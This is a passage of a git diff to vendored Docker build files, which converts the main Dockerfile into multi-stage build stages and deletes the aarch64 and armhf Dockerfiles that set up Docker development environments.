+	libcap-dev \
 	protobuf-compiler \
 	protobuf-c-compiler \
-	python-dev \
-	python-mock \
-	python-pip \
-	python-websocket \
-	ubuntu-zfs \
-	xfsprogs \
-	vim-common \
-	libzfs-dev \
-	tar \
-	zip \
-	--no-install-recommends \
-	&& pip install awscli==1.10.15
-# Get lvm2 source for compiling statically
-ENV LVM2_VERSION 2.02.103
-RUN mkdir -p /usr/local/lvm2 \
-	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
-		| tar -xzC /usr/local/lvm2 --strip-components=1
-# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
-
-# Compile and install lvm2
-RUN cd /usr/local/lvm2 \
-	&& ./configure \
-		--build="$(gcc -print-multiarch)" \
-		--enable-static_link \
-	&& make device-mapper \
-	&& make install_device-mapper
-# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
-
-# Configure the container for OSX cross compilation
-ENV OSX_SDK MacOSX10.11.sdk
-ENV OSX_CROSS_COMMIT a9317c18a3a457ca0a657f08cc4d0d43c6cf8953
-RUN set -x \
-	&& export OSXCROSS_PATH="/osxcross" \
-	&& git clone https://github.com/tpoechtrager/osxcross.git $OSXCROSS_PATH \
-	&& ( cd $OSXCROSS_PATH && git checkout -q $OSX_CROSS_COMMIT) \
-	&& curl -sSL https://s3.dockerproject.org/darwin/v2/${OSX_SDK}.tar.xz -o "${OSXCROSS_PATH}/tarballs/${OSX_SDK}.tar.xz" \
-	&& UNATTENDED=yes OSX_VERSION_MIN=10.6 ${OSXCROSS_PATH}/build.sh
-ENV PATH /osxcross/target/bin:$PATH
-
-# Install seccomp: the version shipped in trusty is too old
-ENV SECCOMP_VERSION 2.3.1
-RUN set -x \
-	&& export SECCOMP_PATH="$(mktemp -d)" \
-	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
-		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
-	&& ( \
-		cd "$SECCOMP_PATH" \
-		&& ./configure --prefix=/usr/local \
-		&& make \
-		&& make install \
-		&& ldconfig \
-	) \
-	&& rm -rf "$SECCOMP_PATH"
-
-# Install Go
-# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines
-#            will need updating, to avoid errors. Ping #docker-maintainers on IRC
-#            with a heads-up.
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \
-	| tar -xzC /usr/local
-
-ENV PATH /go/bin:/usr/local/go/bin:$PATH
-ENV GOPATH /go
-
-# Compile Go for cross compilation
-ENV DOCKER_CROSSPLATFORMS \
-	linux/386 linux/arm \
-	darwin/amd64 \
-	freebsd/amd64 freebsd/386 freebsd/arm \
-	windows/amd64 windows/386 \
-	solaris/amd64
-
-# Dependency for golint
-ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
-RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
-	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
-
-# Grab Go's lint tool
-ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
-RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
-	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
-	&& go install -v github.com/golang/lint/golint
-
-# Install CRIU for checkpoint/restore support
-ENV CRIU_VERSION 2.2
-RUN mkdir -p /usr/src/criu \
-	&& curl -sSL https://github.com/xemul/criu/archive/v${CRIU_VERSION}.tar.gz | tar -v -C /usr/src/criu/ -xz --strip-components=1 \
+	python-protobuf \
+	&& mkdir -p /usr/src/criu \
+	&& curl -sSL https://github.com/checkpoint-restore/criu/archive/v${CRIU_VERSION}.tar.gz | tar -C /usr/src/criu/ -xz --strip-components=1 \
 	&& cd /usr/src/criu \
 	&& make \
-	&& make install-criu
+	&& make PREFIX=/build/ install-criu
 
+FROM base AS registry
 # Install two versions of the registry. The first is an older version that
 # only supports schema1 manifests. The second is a newer version that supports
 # both. This allows integration-cli tests to cover push/pull with both schema1
@@ -171,76 +63,178 @@ RUN set -x \
 	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
 	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
 	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
+		go build -buildmode=pie -o /build/registry-v2 github.com/docker/distribution/cmd/registry \
+	&& case $(dpkg --print-architecture) in \
+		amd64|ppc64*|s390x) \
+		(cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1"); \
+		GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH"; \
+			go build -buildmode=pie -o /build/registry-v2-schema1 github.com/docker/distribution/cmd/registry; \
+		;; \
+	   esac \
 	&& rm -rf "$GOPATH"
 
-# Install notary and notary-server
-ENV NOTARY_VERSION v0.4.2
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
-	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
-	&& rm -rf "$GOPATH"
 
+
+FROM base AS docker-py
 # Get the "docker-py" source so we can run their integration tests
-ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
-RUN git clone https://github.com/docker/docker-py.git /docker-py \
-	&& cd /docker-py \
-	&& git checkout -q $DOCKER_PY_COMMIT \
-	&& pip install -r test-requirements.txt
+ENV DOCKER_PY_COMMIT 8b246db271a85d6541dc458838627e89c683e42f
+RUN git clone https://github.com/docker/docker-py.git /build \
+	&& cd /build \
+	&& git checkout -q $DOCKER_PY_COMMIT
+
 
-# Install yamllint for validating swagger.yaml
-RUN pip install yamllint==1.5.0
 
+FROM base AS swagger
 # Install go-swagger for validating swagger.yaml
 ENV GO_SWAGGER_COMMIT c28258affb0b6251755d92489ef685af8d4ff3eb
-RUN git clone https://github.com/go-swagger/go-swagger.git /go/src/github.com/go-swagger/go-swagger \
-	&& (cd /go/src/github.com/go-swagger/go-swagger && git checkout -q $GO_SWAGGER_COMMIT) \
-	&& go install -v github.com/go-swagger/go-swagger/cmd/swagger
+RUN set -x \
+	&& export GOPATH="$(mktemp -d)" \
+	&& git clone https://github.com/go-swagger/go-swagger.git "$GOPATH/src/github.com/go-swagger/go-swagger" \
+	&& (cd "$GOPATH/src/github.com/go-swagger/go-swagger" && git checkout -q "$GO_SWAGGER_COMMIT") \
+	&& go build -o /build/swagger github.com/go-swagger/go-swagger/cmd/swagger \
+	&& rm -rf "$GOPATH"
 
-# Set user.email so crosbymichael's in-container merge commits go smoothly
-RUN git config --global user.email 'docker-dummy@example.com'
 
-# Add an unprivileged user to be used for tests which need it
+FROM base AS frozen-images
+RUN apt-get update && apt-get install -y jq ca-certificates --no-install-recommends
+# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
+COPY contrib/download-frozen-image-v2.sh /
+RUN /download-frozen-image-v2.sh /build \
+	buildpack-deps:jessie@sha256:dd86dced7c9cd2a724e779730f0a53f93b7ef42228d4344b25ce9a42a1486251 \
+	busybox:latest@sha256:bbc3a03235220b170ba48a157dd097dd1379299370e1ed99ce976df0355d24f0 \
+	busybox:glibc@sha256:0b55a30394294ab23b9afd58fab94e61a923f5834fba7ddbae7f8e0c11ba85e6 \
+	debian:jessie@sha256:287a20c5f73087ab406e6b364833e3fb7b3ae63ca0eb3486555dc27ed32c6e60 \
+	hello-world:latest@sha256:be0cd392e45be79ffeffa6b05338b98ebb16c87b255f48e297ec7f98e123905c
+# See also ensureFrozenImagesLinux() in "integration-cli/fixtures_linux_daemon_test.go" (which needs to be updated when adding images to this list)
+
+# Just a little hack so we don't have to install these deps twice, once for runc and once for dockerd
+FROM base AS runtime-dev
+RUN apt-get update && apt-get install -y \
+	libapparmor-dev \
+	libseccomp-dev
+
+
+FROM base AS tomlv
+ENV INSTALL_BINARY_NAME=tomlv
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM base AS vndr
+ENV INSTALL_BINARY_NAME=vndr
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM base AS containerd
+RUN apt-get update && apt-get install -y btrfs-tools
+ENV INSTALL_BINARY_NAME=containerd
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM base AS proxy
+ENV INSTALL_BINARY_NAME=proxy
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM base AS gometalinter
+ENV INSTALL_BINARY_NAME=gometalinter
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM base AS dockercli
+ENV INSTALL_BINARY_NAME=dockercli
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM runtime-dev AS runc
+ENV INSTALL_BINARY_NAME=runc
+COPY hack/dockerfile/install/install.sh ./install.sh
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+FROM base AS tini
+RUN apt-get update && apt-get install -y cmake vim-common
+COPY hack/dockerfile/install/install.sh ./install.sh
+ENV INSTALL_BINARY_NAME=tini
+COPY hack/dockerfile/install/$INSTALL_BINARY_NAME.installer ./
+RUN PREFIX=/build/ ./install.sh $INSTALL_BINARY_NAME
+
+
+
+# TODO: Some of this is only really needed for testing, it would be nice to split this up
+FROM runtime-dev AS dev
 RUN groupadd -r docker
 RUN useradd --create-home --gid docker unprivilegeduser
+# Activate bash completion and include Docker's completion if mounted with DOCKER_BASH_COMPLETION_PATH
+RUN echo "source /usr/share/bash-completion/bash_completion" >> /etc/bash.bashrc
+RUN ln -s /usr/local/completion/bash/docker /etc/bash_completion.d/docker
+RUN ldconfig
+# This should only install packages that are specifically needed for the dev environment and nothing else
+# Do you really need to add another package here? Can it be done in a different build stage?
+RUN apt-get update && apt-get install -y \
+	apparmor \
+	aufs-tools \
+	bash-completion \
+	btrfs-tools \
+	iptables \
+	jq \
+	libdevmapper-dev \
+	libudev-dev \
+	libsystemd-dev \
+	binutils-mingw-w64 \
+	g++-mingw-w64-x86-64 \
+	net-tools \
+	pigz \
+	python-backports.ssl-match-hostname \
+	python-dev \
+	python-mock \
+	python-pip \
+	python-requests \
+	python-setuptools \
+	python-websocket \
+	python-wheel \
+	thin-provisioning-tools \
+	vim \
+	vim-common \
+	xfsprogs \
+	zip \
+	bzip2 \
+	xz-utils \
+	--no-install-recommends
+COPY --from=swagger /build/swagger* /usr/local/bin/
+COPY --from=frozen-images /build/ /docker-frozen-images
+COPY --from=gometalinter /build/ /usr/local/bin/
+COPY --from=tomlv /build/ /usr/local/bin/
+COPY --from=vndr /build/ /usr/local/bin/
+COPY --from=tini /build/ /usr/local/bin/
+COPY --from=runc /build/ /usr/local/bin/
+COPY --from=containerd /build/ /usr/local/bin/
+COPY --from=proxy /build/ /usr/local/bin/
+COPY --from=dockercli /build/ /usr/local/cli
+COPY --from=registry /build/registry* /usr/local/bin/
+COPY --from=criu /build/ /usr/local/
+COPY --from=docker-py /build/ /docker-py
+# TODO: This is for the docker-py tests, which shouldn't really be needed for
+# this image, but currently CI is expecting to run this image. This should be
+# split out into a separate image, including all the `python-*` deps installed
+# above.
+RUN cd /docker-py \
+	&& pip install docker-pycreds==0.2.1 \
+	&& pip install yamllint==1.5.0 \
+	&& pip install -r test-requirements.txt
 
-VOLUME /var/lib/docker
+ENV PATH=/usr/local/cli:$PATH
+ENV DOCKER_BUILDTAGS apparmor seccomp selinux
+# Options for hack/validate/gometalinter
+ENV GOMETALINTER_OPTS="--deadline=2m"
 WORKDIR /go/src/github.com/docker/docker
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-
-# Let us use a .bashrc file
-RUN ln -sfv $PWD/.bashrc ~/.bashrc
-# Add integration helps to bashrc
-RUN echo "source $PWD/hack/make/.integration-test-helpers" >> /etc/bash.bashrc
-
-# Register Docker's bash completion.
-RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
-
-# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
-COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
-RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
-	buildpack-deps:jessie@sha256:25785f89240fbcdd8a74bdaf30dd5599a9523882c6dfc567f2e9ef7cf6f79db6 \
-	busybox:latest@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 \
-	debian:jessie@sha256:f968f10b4b523737e253a97eac59b0d1420b5c19b69928d35801a6373ffe330e \
-	hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7
-# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
-
-# Install tomlv, vndr, runc, containerd, tini, docker-proxy
-# Please edit hack/dockerfile/install-binaries.sh to update them.
-COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
-COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
-RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy bindata
-
+VOLUME /var/lib/docker
 # Wrap all commands in the "docker-in-docker" script to allow nested containers
 ENTRYPOINT ["hack/dind"]
-
 # Upload docker source
 COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.aarch64 b/vendor/github.com/docker/docker/Dockerfile.aarch64
deleted file mode 100644
index 6112f802f7..0000000000
--- a/vendor/github.com/docker/docker/Dockerfile.aarch64
+++ /dev/null
@@ -1,175 +0,0 @@
-# This file describes the standard way to build Docker on aarch64, using docker
-#
-# Usage:
-#
-# # Assemble the full dev environment. This is slow the first time.
-# docker build -t docker -f Dockerfile.aarch64 .
-#
-# # Mount your source in an interactive container for quick testing:
-# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
-#
-# # Run the test suite:
-# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
-#
-# Note: AppArmor used to mess with privileged mode, but this is no longer
-# the case. Therefore, you don't have to disable it anymore.
-#
-
-FROM aarch64/ubuntu:wily
-
-# Packaged dependencies
-RUN apt-get update && apt-get install -y \
-	apparmor \
-	aufs-tools \
-	automake \
-	bash-completion \
-	btrfs-tools \
-	build-essential \
-	cmake \
-	createrepo \
-	curl \
-	dpkg-sig \
-	g++ \
-	gcc \
-	git \
-	iptables \
-	jq \
-	libapparmor-dev \
-	libc6-dev \
-	libcap-dev \
-	libltdl-dev \
-	libsqlite3-dev \
-	libsystemd-dev \
-	mercurial \
-	net-tools \
-	parallel \
-	pkg-config \
-	python-dev \
-	python-mock \
-	python-pip \
-	python-websocket \
-	gccgo \
-	iproute2 \
-	iputils-ping \
-	vim-common \
-	--no-install-recommends
-
-# Get lvm2 source for compiling statically
-ENV LVM2_VERSION 2.02.103
-RUN mkdir -p /usr/local/lvm2 \
-	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
-		| tar -xzC /usr/local/lvm2 --strip-components=1
-# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
-
-# Fix platform enablement in lvm2 to support aarch64 properly
-RUN set -e \
-	&& for f in config.guess config.sub; do \
-		curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \
-	done
-# "arch.c:78:2: error: #error the arch code needs to know about your machine type"
-
-# Compile and install lvm2
-RUN cd /usr/local/lvm2 \
-	&& ./configure \
-		--build="$(gcc -print-multiarch)" \
-		--enable-static_link \
-	&& make device-mapper \
-	&& make install_device-mapper
-# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
-
-# Install seccomp: the version shipped in trusty is too old
-ENV SECCOMP_VERSION 2.3.1
-RUN set -x \
-	&& export SECCOMP_PATH="$(mktemp -d)" \
-	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
-		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
-	&& ( \
-		cd "$SECCOMP_PATH" \
-		&& ./configure --prefix=/usr/local \
-		&& make \
-		&& make install \
-		&& ldconfig \
-	) \
-	&& rm -rf "$SECCOMP_PATH"
-
-# Install Go
-# We don't have official binary tarballs for ARM64, eigher for Go or bootstrap,
-# so we use gccgo as bootstrap to build Go from source code.
-# We don't use the official ARMv6 released binaries as a GOROOT_BOOTSTRAP, because
-# not all ARM64 platforms support 32-bit mode. 32-bit mode is optional for ARMv8.
-ENV GO_VERSION 1.7.5
-RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \
-	&& cd /usr/src/go/src \
-	&& GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash
-
-ENV PATH /usr/src/go/bin:$PATH
-ENV GOPATH /go
-
-# Only install one version of the registry, because old version which support
-# schema1 manifests is not working on ARM64, we should skip integration-cli
-# tests for schema1 manifests on ARM64.
-ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
-	&& rm -rf "$GOPATH"
-
-# Install notary and notary-server
-ENV NOTARY_VERSION v0.4.2
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
-	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
-	&& rm -rf "$GOPATH"
-
-# Get the "docker-py" source so we can run their integration tests
-ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
-RUN git clone https://github.com/docker/docker-py.git /docker-py \
-	&& cd /docker-py \
-	&& git checkout -q $DOCKER_PY_COMMIT \
-	&& pip install -r test-requirements.txt
-
-# Set user.email so crosbymichael's in-container merge commits go smoothly
-RUN git config --global user.email 'docker-dummy@example.com'
-
-# Add an unprivileged user to be used for tests which need it
-RUN groupadd -r docker
-RUN useradd --create-home --gid docker unprivilegeduser
-
-VOLUME /var/lib/docker
-WORKDIR /go/src/github.com/docker/docker
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-
-# Let us use a .bashrc file
-RUN ln -sfv $PWD/.bashrc ~/.bashrc
-
-# Register Docker's bash completion.
-RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
-
-# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
-COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
-RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
-	aarch64/buildpack-deps:jessie@sha256:6aa1d6910791b7ac78265fd0798e5abd6cb3f27ae992f6f960f6c303ec9535f2 \
-	aarch64/busybox:latest@sha256:b23a6a37cf269dff6e46d2473b6e227afa42b037e6d23435f1d2bc40fc8c2828 \
-	aarch64/debian:jessie@sha256:4be74a41a7c70ebe887b634b11ffe516cf4fcd56864a54941e56bb49883c3170 \
-	aarch64/hello-world:latest@sha256:65a4a158587b307bb02db4de41b836addb0c35175bdc801367b1ac1ddeb9afda
-# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
-
-# Install tomlv, vndr, runc, containerd, tini, docker-proxy
-# Please edit hack/dockerfile/install-binaries.sh to update them.
-COPY hack/dockerfile/binaries-commits /tmp/binaries-commits
-COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh
-RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy
-
-# Wrap all commands in the "docker-in-docker" script to allow nested containers
-ENTRYPOINT ["hack/dind"]
-
-# Upload docker source
-COPY . /go/src/github.com/docker/docker
diff --git a/vendor/github.com/docker/docker/Dockerfile.armhf b/vendor/github.com/docker/docker/Dockerfile.armhf
deleted file mode 100644
index 1aebc166b3..0000000000
--- a/vendor/github.com/docker/docker/Dockerfile.armhf
+++ /dev/null
@@ -1,182 +0,0 @@
-# This file describes the standard way to build Docker on ARMv7, using docker
-#
-# Usage:
-#
-# # Assemble the full dev environment. This is slow the first time.
-# docker build -t docker -f Dockerfile.armhf .
-#
-# # Mount your source in an interactive container for quick testing:
-# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash
-#
-# # Run the test suite:
-# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py
-#
-# Note: AppArmor used to mess with privileged mode, but this is no longer
-# the case. Therefore, you don't have to disable it anymore.
-#
-
-FROM armhf/debian:jessie
-
-# allow replacing httpredir or deb mirror
-ARG APT_MIRROR=deb.debian.org
-RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
-
-# Packaged dependencies
-RUN apt-get update && apt-get install -y \
-	apparmor \
-	aufs-tools \
-	automake \
-	bash-completion \
-	btrfs-tools \
-	build-essential \
-	createrepo \
-	curl \
-	cmake \
-	dpkg-sig \
-	git \
-	iptables \
-	jq \
-	net-tools \
-	libapparmor-dev \
-	libcap-dev \
-	libltdl-dev \
-	libsqlite3-dev \
-	libsystemd-journal-dev \
-	libtool \
-	mercurial \
-	pkg-config \
-	python-dev \
-	python-mock \
-	python-pip \
-	python-websocket \
-	xfsprogs \
-	tar \
-	vim-common \
-	--no-install-recommends \
-	&& pip install awscli==1.10.15
-
-# Get lvm2 source for compiling statically
-ENV LVM2_VERSION 2.02.103
-RUN mkdir -p /usr/local/lvm2 \
-	&& curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \
-		| tar -xzC /usr/local/lvm2 --strip-components=1
-# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags
-
-# Compile and install lvm2
-RUN cd /usr/local/lvm2 \
-	&& ./configure \
-		--build="$(gcc -print-multiarch)" \
-		--enable-static_link \
-	&& make device-mapper \
-	&& make install_device-mapper
-# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL
-
-# Install Go
-ENV GO_VERSION 1.7.5
-RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" \
-	| tar -xzC /usr/local
-ENV PATH /go/bin:/usr/local/go/bin:$PATH
-ENV GOPATH /go
-
-# We're building for armhf, which is ARMv7, so let's be explicit about that
-ENV GOARCH arm
-ENV GOARM 7
-
-# Dependency for golint
-ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3
-RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \
-	&& (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT)
-
-# Grab Go's lint tool
-ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456
-RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \
-	&& (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \
-	&& go install -v github.com/golang/lint/golint
-
-# Install seccomp: the version shipped in trusty is too old
-ENV SECCOMP_VERSION 2.3.1
-RUN set -x \
-	&& export SECCOMP_PATH="$(mktemp -d)" \
-	&& curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \
-		| tar -xzC "$SECCOMP_PATH" --strip-components=1 \
-	&& ( \
-		cd "$SECCOMP_PATH" \
-		&& ./configure --prefix=/usr/local \
-		&& make \
-		&& make install \
-		&& ldconfig \
-	) \
-	&& rm -rf "$SECCOMP_PATH"
-
-# Install two versions of the registry. The first is an older version that
-# only supports schema1 manifests. The second is a newer version that supports
-# both. This allows integration-cli tests to cover push/pull with both schema1
-# and schema2 manifests.
-ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd
-ENV REGISTRY_COMMIT cb08de17d74bef86ce6c5abe8b240e282f5750be
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \
-	&& (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \
-	&& GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \
-		go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \
-	&& rm -rf "$GOPATH"
-
-# Install notary and notary-server
-ENV NOTARY_VERSION v0.4.2
-RUN set -x \
-	&& export GOPATH="$(mktemp -d)" \
-	&& git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \
-	&& (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \
-	&& GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \
-		go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \
-	&& rm -rf "$GOPATH"
-
-# Get the "docker-py" source so we can run their integration tests
-ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324
-RUN git clone https://github.com/docker/docker-py.git /docker-py \
-	&& cd /docker-py \
-	&& git checkout -q $DOCKER_PY_COMMIT \
-	&& pip install -r test-requirements.txt
-
-# Set user.email so crosbymichael's in-container merge commits go smoothly
-RUN git config --global user.email 'docker-dummy@example.com'
-
-# Add an unprivileged user to be used for tests which need it
-RUN groupadd -r docker
-RUN useradd --create-home --gid docker unprivilegeduser
-
-VOLUME /var/lib/docker
-WORKDIR /go/src/github.com/docker/docker
-ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
-
-# Let us use a .bashrc file
-RUN ln -sfv $PWD/.bashrc ~/.bashrc
-
-# Register Docker's bash completion.
-RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker
-
-# Get useful and necessary Hub images so we can "docker load" locally instead of pulling
-COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/
-RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \
-	armhf/buildpack-deps:jessie@sha256:ca6cce8e5bf5c952129889b5cc15cd6aa8d995d77e55e3749bbaadae50e476cb \
-	armhf/busybox:latest@sha256:d98a7343ac750ffe387e3d514f8521ba69846c216778919b01414b8617cfb3d4 \
-	armhf/debian:jessie@sha256:4a2187483f04a84f9830910fe3581d69b3c985cc045d9f01d8e2f3795b28107b \
-	armhf/hello-world:latest@sha256:161dcecea0225975b2ad5f768058212c1e0d39e8211098666ffa1ac74cfb7791
-# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is)
-
-# Install tomlv, vndr, runc, containerd, tini, docker-proxy
-# Please edit hack/dockerfile/install-binaries.sh to update them.
